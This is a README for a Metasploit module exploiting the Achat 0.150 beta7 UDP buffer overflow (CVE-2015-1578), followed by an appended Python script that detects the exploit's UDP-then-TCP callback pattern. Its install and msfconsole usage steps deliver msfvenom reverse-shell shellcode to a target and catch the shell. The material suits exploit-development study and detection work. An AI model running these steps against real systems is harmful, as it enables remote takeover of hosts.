# CVE-2015-1578 Metasploit Module
## Overview
This is a Metasploit module for **CVE-2015-1578**, a buffer overflow vulnerability in **Achat 0.150 beta7** on Windows. Exploitation leads to remote code execution via a crafted UDP packet.
## Purpose
This module is designed to serve as a clean, minimal, and well-structured example of Metasploit exploit development. It demonstrates:
- Dynamic Unicode-encoded shellcode generation via `msfvenom`
- Manual payload injection (bypassing Metasploit's internal payload encoder)
- Simple UDP-based delivery mechanism
- Integration into the Metasploit Framework using custom module loading
## Video Tutorial
[Video tutorial on YouTube](https://youtu.be/f3Bn3VAzc3g)
## Dependencies
- Metasploit Framework
- `msfvenom` in your `$PATH`
## Features
- Uses `msfvenom` to generate payload with `x86/unicode_mixed` encoding and custom bad characters
- Avoids Metasploit’s built-in payload encoding system to work around encoder limitations
## Installation
```bash
./install.sh
```
Then launch Metasploit and run:
```
reload_all
use exploit/windows/yaldobaoth/achat_bof
```
## Options
- `RHOSTS` – Target IP address (required)
- `LHOST` – Local host IP for reverse shell (required)
- `LPORT` – Local port for reverse shell (default: 4444)
- `RPORT` – Remote UDP port on target (default: 9256)
## Usage Example
```
msfconsole
use exploit/windows/yaldobaoth/achat_bof
set RHOSTS 10.10.10.74
set LHOST 10.10.16.7
set LPORT 9393
run
```
This will:
- Generate a Unicode-compatible reverse shell payload with msfvenom
- Inject it into the vulnerable Achat buffer over UDP
- Listen for the shell on the specified `LHOST:LPORT`
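From the defender's side, the sequence above leaves a recognizable network trace: a datagram to the Achat UDP port, then a TCP connection from the same host back to the sender. The following is an added detection example, not part of this repository; the flow-record format, the 60-second window, and the assumption that the listener shares the sender's address are all chosen for illustration.

```python
import csv
from datetime import datetime
from io import StringIO

ACHAT_UDP_PORT = 9256   # default RPORT listed in this README
WINDOW_SECONDS = 60     # assumption: the callback follows delivery within a minute

# Constructed flow records (not real telemetry): time,proto,src,sport,dst,dport
SAMPLE_FLOWS = """\
2024-01-01T10:00:00,udp,10.10.10.50,9256,10.10.10.74,9256
2024-01-01T10:00:05,tcp,10.10.10.74,49160,10.10.10.20,445
2024-01-01T10:05:00,udp,10.10.16.7,51000,10.10.10.74,9256
2024-01-01T10:05:02,tcp,10.10.10.74,49171,10.10.16.7,9393
2024-01-01T10:30:00,tcp,10.10.10.74,49180,10.10.16.7,9393
"""

def parse_flows(text):
    """Parse CSV flow records into dicts, ordered by timestamp."""
    flows = []
    for row in csv.reader(StringIO(text)):
        if not row:
            continue
        ts, proto, src, _sport, dst, dport = row
        flows.append({"ts": datetime.fromisoformat(ts), "proto": proto,
                      "src": src, "dst": dst, "dport": int(dport)})
    return sorted(flows, key=lambda f: f["ts"])

def correlate(flows, udp_port=ACHAT_UDP_PORT, window=WINDOW_SECONDS):
    """Flag hosts that open TCP to a peer shortly after that peer sent them
    a datagram on the Achat port."""
    alerts = []
    last_udp = {}  # (sender, receiver) -> time of latest datagram to udp_port
    for f in flows:
        if f["proto"] == "udp" and f["dport"] == udp_port:
            last_udp[(f["src"], f["dst"])] = f["ts"]
        elif f["proto"] == "tcp":
            seen = last_udp.get((f["dst"], f["src"]))
            if seen is None:
                continue
            delay = (f["ts"] - seen).total_seconds()
            if 0 <= delay <= window:
                alerts.append({"host": f["src"], "peer": f["dst"],
                               "port": f["dport"], "delay": delay})
    return alerts

if __name__ == "__main__":
    for alert in correlate(parse_flows(SAMPLE_FLOWS)):
        print(alert)
```

If the listener can sit on a different address than the sender, drop the peer match and alert on any new outbound TCP from the Achat host inside the window, at the cost of more noise.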